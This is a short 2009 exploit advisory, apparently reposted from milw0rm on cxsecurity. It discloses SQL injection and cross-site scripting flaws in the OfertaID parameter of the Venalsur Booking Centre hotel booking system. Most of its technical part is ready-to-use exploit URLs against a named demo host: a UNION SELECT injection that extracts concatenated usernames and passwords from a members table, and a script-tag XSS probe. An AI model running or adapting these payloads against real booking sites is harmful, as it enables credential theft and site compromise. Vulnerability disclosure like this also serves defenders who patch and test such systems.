Bug: Venalsur on-line Booking Centre (OfertaID) XSS/SQL Injection Vulns (WLB-2009020233 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Venalsur on-line Booking Centre (OfertaID) XSS/SQL Injection Vulns
 Credit: d3b4g
 Date: 2009.02.23
 CWE: CWE-79 (Show similar)
 CVE: CVE-2008-6215 (Show details)
CVE-2008-6216 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
Yes
Yes

Booking System for Hotels Group powered by Venalsur Bookingcenter XSS/SQL injetion vulnerability!
------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------
Author: d3b4g

Greetz: str0ke,,Darkc0de.com,rez0rn,draconyx,godinlaw,hatebreeder And all my friends
Site : www.bl4ck3nd.info
Contact: bl4ckend[at]gmail[dot]com
-------------------------------------------------------------------


-------------------------------------------------------------------
Dork: N/A
-------------------------------------------------------------------
Affected software:

-----------------
Application : Booking System for Hotels Group powered by Venalsur Bookingcenter
URL : http://www.bookingcentre.eu
===================================================================

Sql injection
=============


Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql]

Demo :
http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5
,6,7,8,9,10,11+from+members/*

------------------------------------------------------------------------

Xss
===

Exploit:http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert(40323.6285846991)</scr
ipt>

=========================================================================

Proud to be a maldivian :):) Happy new maldives [29.10.2008]

References:

http://www.milw0rm.com/exploits/6876

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com